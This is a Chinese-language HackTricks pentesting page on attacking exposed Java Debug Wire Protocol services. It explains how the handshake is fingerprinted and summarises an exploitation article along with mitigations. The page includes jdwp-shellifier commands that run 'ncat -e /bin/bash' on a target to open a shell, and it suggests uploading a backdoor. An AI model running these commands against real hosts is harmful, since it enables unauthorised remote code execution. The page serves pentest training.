hacktricks/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md

6.1 KiB
Raw Blame History

渗透 JDWP - Java Debug Wire Protocol

从零开始学习 AWS 黑客技术,成为专家 htARTEHackTricks AWS 红队专家)

支持 HackTricks 的其他方式:

利用

JDWP 利用取决于协议缺乏身份验证和加密。通常在端口 8000上找到但也可能在其他端口上。通过向目标端口发送“JDWP-Handshake”进行初始连接。如果存在 JDWP 服务,它会以相同的字符串回复,确认其存在。这个握手作为一种指纹识别方法,用于识别网络上的 JDWP 服务。

在进程识别方面,搜索 Java 进程中的字符串“jdwk”可能表明存在活动的 JDWP 会话。

首选工具是 jdwp-shellifier。您可以使用不同的参数:

./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept

我发现使用--break-on 'java.lang.String.indexOf'使得利用更加稳定。如果你有机会上传一个后门到主机并执行它而不是执行一个命令,那么利用将会更加稳定。

更多细节

这是https://ioactive.com/hacking-java-debug-wire-protocol-or-how/的摘要。查看以获取更多细节。

  1. JDWP 概述:
  • 这是一个基于数据包的网络二进制协议,主要是同步的。
  • 缺乏身份验证和加密,使其在暴露于敌对网络时容易受到攻击。
  1. JDWP 握手:
  • 使用简单的握手过程来启动通信。调试器客户端和被调试者服务器之间交换一个14个字符的ASCII字符串“JDWP-Handshake”。
  1. JDWP 通信:
  • 消息具有简单的结构包含长度、ID、标志和命令集等字段。
  • 命令集的值范围从0x40到0x80代表不同的操作和事件。
  1. 利用:
  • JDWP允许加载和调用任意类和字节码存在安全风险。
  • 该文章详细介绍了一个利用过程包括获取Java运行时引用、设置断点和调用方法等五个步骤。
  1. 实际利用:
  • 尽管存在潜在的防火墙保护JDWP服务在现实世界的场景中是可发现和可利用的如在ShodanHQ和GitHub等平台上的搜索所示。
  • 该利用脚本已针对各种JDK版本进行测试且与平台无关提供可靠的远程代码执行RCE
  1. 安全影响:
  • 互联网上存在开放的JDWP服务强调了需要定期进行安全审查、在生产环境中禁用调试功能以及正确配置防火墙的必要性。

参考资料:

从零开始学习AWS黑客技术成为专家 htARTEHackTricks AWS Red Team Expert

支持HackTricks的其他方式: